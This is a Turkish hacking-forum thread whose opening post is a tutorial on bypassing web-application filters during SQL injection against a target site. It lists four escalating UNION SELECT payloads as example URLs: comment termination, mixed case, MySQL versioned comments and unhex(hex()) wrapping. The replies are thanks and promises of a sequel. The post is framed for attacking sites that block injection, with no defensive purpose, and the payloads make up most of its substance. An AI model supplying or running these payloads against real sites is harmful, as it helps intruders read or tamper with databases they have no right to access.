Konuyu Oyla:
  • Derecelendirme: 3.86/5 - 7 oy
  • 1
  • 2
  • 3
  • 4
  • 5
SQL İnjection Bypass Series - 1
#1
Merhaba Arkadaşlar,

Bu konumda sizlere SQL injectionda bilmeniz gereken birkaç bypass yöntemini göstericem.


Şimdi diyelimki hedef sitemizde SQL açığı var.
Ve hemen klasik SQL komutlarımızı girdik.

http://www.hedefsite.com/index.php?id=1 order by ....

kolonu bulduğumuzu farzediyorum.Kolon sayımız 5 olsun.

http://www.hedefsite.com/index.php?id=1 union select 1,2,3,4,5

bu şekilde yaptık, ve hedef sitemiz bize uyarılar vermeye başladı(internet server error,forbidden vs.)

bu durumda yapacağımız şey bypass uygulamaktır:

BYPASS 1:

http://www.hedefsite.com/index.php?id=1 union select 1,2,3,4,5--


sonuna -- koyarak ilk bypass denememizi gerçekleştiriyoruz.Bunda başarılı olamazsak:

BYPASS 2:

http://www.hedefsite.com/index.php?id=1 UNiOn SeLeCt 1,2,3,4,5--


union select komutunu büyüklü küçüklü yazıyoruz.Buda olmazsa:

BYPASS 3:

http://www.hedefsite.com/index.php?id=1 /*!UNiOn*/ /*!SeLeCt*/ 1,2,3,4,5--



union select komutumuzu yorummuş gibi gösterip bypass ediyoruz.Buda olmazsa:

BYPASS 4:

http://www.hedefsite.com/index.php?id=1 /*!UNiOn*/ /*!SeLeCt*/ unhex(hex(1)),unhex(hex(2)),unhex(hex(3)),unhex(hex(4)),unhex(hex(5))--


sayılarımızı hexleyip bypass ediyoruz.Buda olmazsa:


SONRAKİ MAKALEMİ BEKLEYİN...


Diğer makalemde daha ileri düzey bypass yöntemlerini göstericem.....
Beğenenler:
#2
eline sağlık, döküman sana mı ait exciting
İnsɑnlɑr değişmez değişen tek şey şɑrtlɑr ve çıkɑrlɑr...
Beğenenler:
#3
(27-02-2014, Saat: 23:36)H4CK4L Adlı Kullanıcıdan Alıntı: eline sağlık, döküman sana mı ait exciting

Döküman tamamen bana aittir.

Aynı dökümanı daha önceden başka bir forumda paylaşmıştım.
Hatta aynı döküman forum forum gezdi.

O kadar faydalı yani exciting
Beğenenler:
#4
Döküman sağlam döküman exciting
Beğenenler:
#5
(27-02-2014, Saat: 23:38)HaR@Be Adlı Kullanıcıdan Alıntı:
(27-02-2014, Saat: 23:36)H4CK4L Adlı Kullanıcıdan Alıntı: eline sağlık, döküman sana mı ait exciting

Döküman tamamen bana aittir.

Aynı dökümanı daha önceden başka bir forumda paylaşmıştım.
Hatta aynı döküman forum forum gezdi.

O kadar faydalı yani exciting

Güzel Döküman Olmuş Devamı Gelsın exciting
İnsɑnlɑr değişmez değişen tek şey şɑrtlɑr ve çıkɑrlɑr...
Beğenenler:
#6
(28-02-2014, Saat: 04:38)DUM@N Adlı Kullanıcıdan Alıntı: Döküman sağlam döküman exciting

exciting teşekkürler
Beğenenler:
#7
(28-02-2014, Saat: 14:02)H4CK4L Adlı Kullanıcıdan Alıntı:
(27-02-2014, Saat: 23:38)HaR@Be Adlı Kullanıcıdan Alıntı:
(27-02-2014, Saat: 23:36)H4CK4L Adlı Kullanıcıdan Alıntı: eline sağlık, döküman sana mı ait exciting

Döküman tamamen bana aittir.

Aynı dökümanı daha önceden başka bir forumda paylaşmıştım.
Hatta aynı döküman forum forum gezdi.

O kadar faydalı yani exciting

Güzel Döküman Olmuş Devamı Gelsın exciting

Geliyor yolda exciting
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Web Servislerinde İnjection Zaafiyetler CyberHacker 0 25 04-12-2016, Saat: 00:36
Son Yorum: CyberHacker
  İsimtescil,Natro File Uploader ByPass Ayar 61 2,058 02-12-2016, Saat: 21:38
Son Yorum: Kolonkun
  Okunamayan Konfigürasyon Dosyasına ByPass Yöntemi KingSkrupellos 6 249 02-12-2016, Saat: 21:12
Son Yorum: Kolonkun
  OVH - Bluehost Bypass Ayar 35 1,083 02-12-2016, Saat: 17:42
Son Yorum: Kadircm
  Htaccess İle Güvenlikleri Bypass Etmek Mr.F92 35 732 02-12-2016, Saat: 17:36
Son Yorum: Kadircm
Anahtar Kelimeler

SQL İnjection Bypass Series - 1 indir, SQL İnjection Bypass Series - 1 Videosu, SQL İnjection Bypass Series - 1 Online izle, SQL İnjection Bypass Series - 1 Bedava indir, SQL İnjection Bypass Series - 1 Yükle, SQL İnjection Bypass Series - 1 Hakkında, SQL İnjection Bypass Series - 1 Nedir, SQL İnjection Bypass Series - 1 Free indir, SQL İnjection Bypass Series - 1 Oyunu, SQL İnjection Bypass Series - 1 Download


1 Ziyaretçi